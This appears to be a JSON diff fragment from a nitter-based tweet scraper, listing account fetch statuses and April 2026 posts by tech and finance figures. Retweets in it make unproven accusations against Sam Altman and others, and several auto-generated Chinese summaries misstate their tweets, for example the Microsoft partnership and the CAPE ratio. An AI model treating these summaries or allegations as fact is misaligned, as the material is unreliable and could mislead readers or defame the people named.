"error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", + "url": "https://x.com/elonmusk/status/2048807976991850953", + "published_at": "2026-04-27T16:54:21+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of concern for the truth. People who worked with him say he lies easily but still wants everyone to like him.\n\n• Top scientist Ilya made 70 pages of notes before the firing. They showed Sam was not honest with the team and board about safety rules.\n\n• He changed OpenAI from a nonprofit that Elon helped start to a for profit money making business. It was meant to be open for everyone with no personal gain.\n\n• He trained OpenAI on Twitter data without permission.\n\n• He keeps lying and shows a lack of transparency.\n\n• He poached xAI staff and took sensitive info illegally.\n\n• He dropped core safety promises to race for growth and money. Old team members say his big expensive AI projects around the world are too dangerous.\n\n• An ex OpenAI board member flat out called him a liar.\n\nThis is not just talk. It is what the people closest to him said and what the facts show. When the folks who worked with him say he cannot be trusted.", + "url": "https://x.com/elonmusk/status/2048804363595059425", + "published_at": "2026-04-27T16:39:59+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Exactly", + "url": "https://x.com/elonmusk/status/2048802239272169582", + "published_at": "2026-04-27T16:31:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style. After this lawsuit, Scam will also be awarded tens of billions in stock directly. \n\nThe fundamental question is simply this: \n\nDo you want to set legal precedent in the United States that it is ok to loot a charity? If so, you undermine all charitable giving in the United States forever.\n\nI could have started OpenAI as a for-profit corporation. Instead, I started it, funded it, recruited critical talent and taught them everything I know about how to make a startup successful FOR THE PUBLIC GOOD.\n\nThen they stole the charity.", + "url": "https://x.com/elonmusk/status/2048801964457140540", + "published_at": "2026-04-27T16:30:27+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Scam Altman", + "url": "https://x.com/elonmusk/status/2048799712375902624", + "published_at": "2026-04-27T16:21:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", + "url": "https://x.com/charliebilello/status/2048799590044852390", + "published_at": "2026-04-27T16:21:01+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 \n\nFrom hill country ranches to Austin in ten minutes?! \n\nIf you could buy one for $2m, or lease for $5k a month, and commute into a city from the burbs?!? Wild. https://x.com/shaig/status/2048771337687101850/video/1", + "url": "https://x.com/jason/status/2048797572014207114", + "published_at": "2026-04-27T16:13:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "10 minutes from manhattan to jfk is a game changer… \n\n… but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! \n\nImagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 https://x.com/shaig/status/2048771337687101850/video/1", + "url": "https://x.com/jason/status/2048796982227972344", + "published_at": "2026-04-27T16:10:40+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter", + "title_zh": "AI原生研发团队组织形态出现结构性转变,代码代理工具显著提升开发效率,催生工程师向产品经理、设计师等复合型角色转型,重塑软件产业分工体系" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱", + "url": "https://x.com/elonmusk/status/2048793511701717143", + "published_at": "2026-04-27T15:56:52+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: update! the @twistartups AI sidebar is going well\n\nThe goal: a live AI sidebar with 4 personas watching the pod in real time\n\nProgress update: \n✅ Side bar (Chrome extension works with any website)\n✅ Two characters: comedian fox + troll alien\n✅ Ability to adjust frequency / skip commentary\n\nit's honestly starting to feel pretty good\n\n\"they want to integrate a fact checker, which is just a polite way of saying their show needs a fact checker\"\n-fox 😂\n\n@Jason check it out 👇", + "url": "https://x.com/jason/status/2048793378511536538", + "published_at": "2026-04-27T15:56:20+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", + "url": "https://x.com/GaryMarcus/status/2048791912149295182", + "published_at": "2026-04-27T15:50:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", + "url": "https://x.com/GaryMarcus/status/2048787646206677207", + "published_at": "2026-04-27T15:33:34+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", + "url": "https://x.com/GaryMarcus/status/2048787157536653627", + "published_at": "2026-04-27T15:31:37+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions.\n\n\"I truly believe, like in my soul, that he is trying to help humanity.\"\n\n\"He has these goals. Like back up the biosphere by making us a multi-planetary species or ushering in electric vehicles.\"\n\n\"These are incredibly important missions.\"\n\n\"Politics became probably the biggest threat as a bottleneck to achieving these very positive missions.\"\n\n\"I personally view the X acquisition as an attempt to help remove these bottlenecks. Through that lens, I think it's been incredibly successful.\"", + "url": "https://x.com/elonmusk/status/2048785882950549854", + "published_at": "2026-04-27T15:26:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", + "url": "https://x.com/elonmusk/status/2048783014075777369", + "published_at": "2026-04-27T15:15:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Best accounts for following Austin air quality? @grok", + "url": "https://x.com/jason/status/2048780089295302690", + "published_at": "2026-04-27T15:03:32+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Excellent point", + "url": "https://x.com/elonmusk/status/2048777628019032335", + "published_at": "2026-04-27T14:53:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", + "url": "https://x.com/GaryMarcus/status/2048771044987777428", + "published_at": "2026-04-27T14:27:36+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://x.com/HarryStebbings/status/2048764743205134644", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2048764741435179442", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048761760971096534", + "published_at": "2026-04-27T13:50:42+00:00", + "source": "nitter", + "title_zh": "先稳后攻特征延续至2026年,交易者惯性减小且更具备逆向操作能力,推动市场回调修复周期明显缩短,反映资本资金结构与投资策略的深层变化" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://x.com/GaryMarcus/status/2048757233174122827", + "published_at": "2026-04-27T13:32:43+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://x.com/HarryStebbings/status/2048756619622707452", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://x.com/sama/status/2048755148361707946", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter", + "title_zh": "Redmond公司宣布与微软续签长期战略合作,2032年前提供核心模型服务,2030年前维持收益分成,同时开放多云平台部署,强化云计算生态优势" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", + "url": "https://x.com/charliebilello/status/2048753179471323584", + "published_at": "2026-04-27T13:16:36+00:00", + "source": "nitter", + "title_zh": "标普500市盈率创23年来新高,高于历史99%时期估值水平,显示市场对科技股盈利持续能力仍存在分歧,需警惕泡沫风险" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://x.com/sama/status/2048751392031203544", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048751094671585397", + "published_at": "2026-04-27T13:08:19+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", + "url": "https://x.com/charliebilello/status/2048747238986305979", + "published_at": "2026-04-27T12:53:00+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial.\n\nTwo opposing worldviews. \nSam Altman transformed a non-profit organization into one of the world's most profitable companies for his own enrichment.\n\n Elon Musk, who did everything he could to limit the development of AI and, faced with a wall of incomprehension, launched Grok to offer a solution that puts the search for truth at the heart of its search engine.\n\nThe trial is of paramount importance. Elon Musk has already stated that, in the event of a victory, any proceeds he receives will be donated to a charity.\n\nI don't know about you, but for the good of humanity, I hope Elon Musk wins.\nVerdict on May 12th", + "url": "https://x.com/elonmusk/status/2048746715805581608", + "published_at": "2026-04-27T12:50:55+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://x.com/GaryMarcus/status/2048746152749846549", + "published_at": "2026-04-27T12:48:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Enables streaming, gaming, video calls & real-time work onboard\n\n• Rollout begins in 2026 as part of fleet-wide upgrade\n\nA major leap in aviation connectivity 🚀", + "url": "https://x.com/elonmusk/status/2048744214230712500", + "published_at": "2026-04-27T12:40:59+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://x.com/GaryMarcus/status/2048742983684784239", + "published_at": "2026-04-27T12:36:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://x.com/GaryMarcus/status/2048739005525877072", + "published_at": "2026-04-27T12:20:17+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", + "url": "https://x.com/elonmusk/status/2048727747954868342", + "published_at": "2026-04-27T11:35:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted to remove him from state ballots. \n\nWhen all of that failed they tried to assassinate him not once but four times. \n\nAnd they go on national television to talk about how we need to vote for them to save democracy.", + "url": "https://x.com/elonmusk/status/2048720909809156378", + "published_at": "2026-04-27T11:08:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://x.com/paulg/status/2048704073356935676", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://x.com/paulg/status/2048701354672050286", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://x.com/paulg/status/2048677984106664227", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "😳", + "url": "https://x.com/pmarca/status/2048677114480873657", + "published_at": "2026-04-27T08:14:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @BrendanEich", + "url": "https://x.com/pmarca/status/2048675385119019444", + "published_at": "2026-04-27T08:07:29+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048674564314685477", + "published_at": "2026-04-27T08:04:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", + "url": "https://x.com/pmarca/status/2048673940072251670", + "published_at": "2026-04-27T08:01:44+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @elonmusk", + "url": "https://x.com/pmarca/status/2048673488383447437", + "published_at": "2026-04-27T07:59:56+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", + "url": "https://x.com/pmarca/status/2048624098398650608", + "published_at": "2026-04-27T04:43:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", + "url": "https://x.com/pmarca/status/2048621340408844368", + "published_at": "2026-04-27T04:32:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2048620511912194339", + "published_at": "2026-04-27T04:29:26+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The apps can rewrite the files. 👀", + "url": "https://x.com/pmarca/status/2048615807190769738", + "published_at": "2026-04-27T04:10:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in 